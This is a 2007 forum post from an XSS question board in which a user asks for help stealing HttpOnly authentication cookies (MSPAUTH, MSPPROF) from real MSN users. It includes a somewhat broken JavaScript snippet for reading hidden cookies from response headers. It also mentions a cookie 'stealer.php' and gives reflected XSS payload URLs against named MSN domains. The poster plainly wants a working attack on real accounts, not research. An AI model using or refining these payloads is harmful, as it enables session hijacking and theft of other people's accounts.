Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
msn xss
Posted by: fireboy
Date: June 28, 2007 02:38AM

hi

i found many variant of msn xss and i get the cookies but as it's httponly cookie i can't read the MSPAUTH and MSPPROF variables.

+ i tried the XST method but it doesn't work with msn servers

+ i tried to send the cookie trough a frame to my stealer.php but not work

+ i tried this script (supposed to extract all the cookie from header and alert it in clear):

-----------------------------------------------------------------------------

<script language="Javascript" type="text/javascript">

// the function that extracts the hidden cookie from the headers
function unHideCookie()
{
var xhr=new XMLHttpRequest(); // create the object
xhr.open("HEAD",document.location,true); // make a HEAD request to the same page
xhr.send(null); // send the request
xhr.onreadystatechange=function()
{
if(xhr.readyState==4)
{
if(xhr.status==200) // if we get the right response
{
var hidden="";
var headers=xhr.getAllResponseHeaders().split("\n"); // read all the headers and store them into an array
for(i=0;i<headers.length;i++)
{
var header=headers.toLowerCase(); // indexOf is case sensitive
if(header.indexOf("httponly")>0) // when we find a hidden cookie
{
var cookie=headers.substring(headers.indexOf(" ")+1,headers.indexOf(";")+1); // extract the "name=value;" sequence
hidden=hidden+cookie+" "; // add the extracted cookie
}
}
// use the hidden cookies that are now in the "hidden" variable
alert(Hidden Cookies: "+hidden);
}
}
}
}
alert("document.cookie: "+document.cookie); // show the visible cookies
unHideCookie(); // show the hidden cookies
</script>

-----------------------------------------------------------------------------
but not work too

any help please to bypass the httpcookie and get all the attribute?

here is some examples of msn xss but there is mooooooore :)

------------------------------------------------------------------------
htp://map.msn.com.cn/mapsearch/result.jsp?city=35"><script>alert(document.cookie)</script>


htp://search.arabia.msn.com/results.aspx?q="><script>alert(document.cookie)</script>

--------------------------------------------------------------------------

please i need a pratical solution
thx

Options: ReplyQuote


Go to: Forum ListMessage ListSearchLog In
Sorry, only registered users may post in this forum.
Click here to login

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *